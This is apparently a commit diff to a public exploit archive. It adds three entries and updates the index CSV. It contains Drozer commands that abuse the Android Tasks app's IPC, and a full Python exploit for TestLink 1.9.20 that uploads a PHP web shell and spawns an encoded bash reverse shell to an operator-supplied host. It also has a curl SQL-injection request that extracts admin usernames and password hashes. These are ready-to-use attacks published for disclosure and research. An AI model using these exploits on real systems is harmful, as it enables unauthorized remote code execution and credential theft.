DB: 2021-02-16

3 changes to exploits/shellcodes Tasks 9.7.3 - Insecure Permissions TestLink 1.9.20 - Unrestricted File Upload (Authenticated) Teachers Record Management System 1.0 - 'searchteacher' SQL Injection
2021-02-16 05:01:53 +00:00 · 2021-02-16 05:01:53 +00:00 · bedbb144ab
commit bedbb144ab
parent 774f3786de
4 changed files with 254 additions and 0 deletions
--- a/exploits/android/local/49563.txt
+++ b/exploits/android/local/49563.txt
@ -0,0 +1,20 @@
+# Exploit Title: Tasks 9.7.3 - Insecure Permissions
+# Date: 18th of July, 2020
+# Exploit Author: Lyhin's Lab
+# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/
+# Vendor Homepage: https://tasks.org/
+# Software Link: https://github.com/tasks/tasks
+# Version: 9.7.3
+# Tested on: Android 9
+
+Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. 
+A malicious application has several ways of how to achieve that:
+
+1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list.
+
+2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list.
+
+We used the Drozer application to emulate malicious app activity. Please find the commands below.
+
+run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa"
+run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org"
--- a/exploits/php/webapps/49561.py
+++ b/exploits/php/webapps/49561.py
@ -0,0 +1,200 @@
+# Exploit Title: TestLink 1.9.20 - Unrestricted File Upload (Authenticated)
+# Date: 14th February 2021
+# Exploit Author: snovvcrash
+# Original Research by: Ackcent AppSec Team
+# Original Research: https://ackcent.com/testlink-1-9-20-unrestricted-file-upload-and-sql-injection/
+# Vendor Homepage: https://testlink.org/
+# Software Link: https://github.com/TestLinkOpenSourceTRMS/testlink-code
+# Version: 1.9.20
+# Tested on: Ubuntu 20.10
+# CVE: CVE-2020-8639
+# Requirements: pip3 install -U requests bs4
+# Usage Example: ./exploit.py -u admin -p admin -P 127.0.0.1:8080 http://127.0.0.1/testlink
+
+"""
+Raw exploit request:
+
+POST /testlink/lib/keywords/keywordsImport.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------242818621515179709592867995067
+Content-Length: 1187
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/testlink//lib/keywords/keywordsImport.php?tproject_id=1
+Cookie: PHPSESSID=kvbpl3t3lec42qbjdcgdppncib; TESTLINK1920TESTLINK_USER_AUTH_COOKIE=af57ebce9f54ce0f0e36d24ef25dc9c1b3a9d2f8e0b9cb4454c973927306e90f
+Upgrade-Insecure-Requests: 1
+
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="CSRFName"
+
+CSRFGuard_1115715115
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="CSRFToken"
+
+506c4b44825c5e5885231c263e7195188dedbd154b9cf74e5d183c1feb953aec7c0edae1097649d82acd20f6f851e0cdbac91cc0589d1cfd6fb13741f9cf0cb8
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="importType"
+
+/../../../logs/pwn.php
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+409600
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="uploadedFile"; filename="foo.xml"
+Content-Type: application/xml
+
+<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?>
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="tproject_id"
+
+1
+-----------------------------242818621515179709592867995067
+Content-Disposition: form-data; name="UploadFile"
+
+Upload file
+-----------------------------242818621515179709592867995067--
+"""
+
+#!/usr/bin/env python3
+
+import re
+from urllib import parse
+from cmd import Cmd
+from base64 import b64encode
+from argparse import ArgumentParser
+
+import requests
+from bs4 import BeautifulSoup
+
+parser = ArgumentParser()
+parser.add_argument('target', help='target full URL without trailing slash, ex. "http://127.0.0.1/testlink"')
+parser.add_argument('-u', '--username', default='admin', help='TestLink username')
+parser.add_argument('-p', '--password', default='admin', help='TestLink password')
+parser.add_argument('-P', '--proxy', default=None, help='HTTP proxy in format <HOST:PORT>, ex. "127.0.0.1:8080"')
+args = parser.parse_args()
+
+
+class TestLinkWebShell(Cmd):
+
+	payloadPHP = """<?php if(isset($_REQUEST['c'])){system($_REQUEST['c'].' 2>&1' );} ?>"""
+	uploadPath = 'logs/pwn.php'
+	prompt = '$ '
+
+	def __init__(self, target, username, password, proxies):
+		super().__init__()
+
+		self.target = target
+		self.username = username
+		self.password = password
+
+		if proxies:
+			self.proxies = {'http': f'http://{proxies}', 'https': f'http://{proxies}'}
+		else:
+			self.proxies = None
+
+		self.session = requests.Session()
+		self.session.verify = False
+
+		resp = self.session.get(f'{self.target}/login.php', proxies=self.proxies)
+		soup = BeautifulSoup(resp.text, 'html.parser')
+
+		self.csrf_name = soup.find('input', {'name': 'CSRFName'}).get('value')
+		self.csrf_token = soup.find('input', {'name': 'CSRFToken'}).get('value')
+		self.req_uri = soup.find('input', {'name': 'reqURI'}).get('value')
+		self.destination = soup.find('input', {'name': 'destination'}).get('value')
+
+	def auth(self):
+		data = {
+			'CSRFName': self.csrf_name,
+			'CSRFToken': self.csrf_token,
+			'reqURI': self.req_uri,
+			'destination': self.destination,
+			'tl_login': self.username,
+			'tl_password': self.password
+		}
+
+		resp = self.session.post(f'{self.target}/login.php?viewer=', data=data, proxies=self.proxies)
+		if resp.status_code == 200:
+			print('[*] Authentication succeeded')
+
+			resp = self.session.get(f'{self.target}/lib/general/mainPage.php', proxies=self.proxies)
+			if resp.status_code == 200:
+				print('[*] Loaded mainPage.php iframe contents')
+				soup = BeautifulSoup(resp.text, 'html.parser')
+
+				self.tproject_id = soup.find('a', {'href': re.compile(r'lib/keywords/keywordsView.php\?')}).get('href')
+				self.tproject_id = parse.parse_qs(parse.urlsplit(self.tproject_id).query)['tproject_id'][0]
+
+				print(f'[+] Extracted tproject_id value: {self.tproject_id}')
+
+			else:
+				raise Exception('Error loading mainPage.php iframe contents')
+
+		else:
+			raise Exception('Authentication failed')
+
+	def upload_web_shell(self):
+		files = [
+			('CSRFName', (None, self.csrf_name)),
+			('CSRFToken', (None, self.csrf_token)),
+			('importType', (None, f'/../../../{TestLinkWebShell.uploadPath}')),
+			('MAX_FILE_SIZE', (None, '409600')),
+			('uploadedFile', ('foo.xml', TestLinkWebShell.payloadPHP)),
+			('tproject_id', (None, self.tproject_id)),
+			('UploadFile', (None, 'Upload file'))
+		]
+
+		resp = self.session.post(f'{self.target}/lib/keywords/keywordsImport.php', files=files, proxies=self.proxies)
+		if resp.status_code == 200:
+			print(f'[*] Web shell uploaded here: {self.target}/{TestLinkWebShell.uploadPath}')
+
+			print('[*] Trying to query whoami...')
+			resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c=whoami', proxies=self.proxies)
+			if resp.status_code == 200:
+				print(f'[+] Success! Starting semi-interactive shell as {resp.text.strip()}')
+
+			else:
+				raise Exception('Error interacting with the web shell')
+
+		else:
+			raise Exception('Error uploading web shell')
+
+	def emptyline(self):
+		pass
+
+	def preloop(self):
+		self.auth()
+		self.upload_web_shell()
+
+	def default(self, args):
+		try:
+			resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c={args}', proxies=self.proxies)
+			if resp.status_code == 200:
+				print(resp.text.strip())
+		except Exception as e:
+			print(f'*** Something weired happened: {e}')
+
+	def do_spawn(self, args):
+		"""Spawn a reverse shell. Usage: \"spawn <LHOST> <LPORT>\"."""
+		try:
+			lhost, lport = args.split()
+			payload = f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'
+			b64_payload = b64encode(payload.encode()).decode()
+			cmd = f'echo {b64_payload} | base64 -d | /bin/bash'
+			self.default(cmd)
+		except Exception as e:
+			print(f'*** Something weired happened: {e}')
+
+	def do_EOF(self, args):
+		"""Use Ctrl-D to exit the shell."""
+		print(); return True
+
+
+if __name__ == '__main__':
+	tlws = TestLinkWebShell(args.target, args.username, args.password, args.proxy)
+	tlws.cmdloop('Type help for list of commands')
--- a/exploits/php/webapps/49562.sh
+++ b/exploits/php/webapps/49562.sh
@ -0,0 +1,31 @@
+# Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection
+# Date: 13/02/2021
+# Exploit Author: Soham Bakore, Nakul Ratti
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html
+# Version:1.0
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+
+--------------------------Proof of Concept-----------------------
+
+1. Navigate to http://host/trms/
+2. The "searchteacher" parameter in search-teacher.php is vulnerable to SQL
+injection
+3. Below curl request will display the admin username and password hash
+
+------------------------Exploit request-----------------------------
+
+curl -i -s -k -X $'POST' \
+    -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0;
+Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
+-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate'
+-H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length:
+130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close'
+-H $'Referer: http://192.168.1.13/trms/' -H $'Cookie:
+PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \
+    -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \
+    --data-binary
+$'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&search='
+\
+    $'http://host/trms/search-teacher.php'
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11262,6 +11262,7 @@ id,file,description,date,author,type,platform,port
 49541,exploits/windows/local/49541.html,"Microsoft Internet Explorer 11 32-bit - Use-After-Free",2021-02-08,"Forrest Orr",local,windows,
 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path",2021-02-09,"Hector Gerbacio",local,windows,
 49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,
+49563,exploits/android/local/49563.txt,"Tasks 9.7.3 - Insecure Permissions",2021-02-15,"Lyhin\'s Lab",local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43531,6 +43532,7 @@ id,file,description,date,author,type,platform,port
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
 49559,exploits/php/webapps/49559.txt,"School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-12,"Pintu Solanki",webapps,php,
 49560,exploits/php/webapps/49560.txt,"School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting",2021-02-12,"Suresh Kumar",webapps,php,
+49561,exploits/php/webapps/49561.py,"TestLink 1.9.20 - Unrestricted File Upload (Authenticated)",2021-02-15,snovvcrash,webapps,php,
 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
@ -43749,3 +43751,4 @@ id,file,description,date,author,type,platform,port
 49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php,
 49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
 49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,
+49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,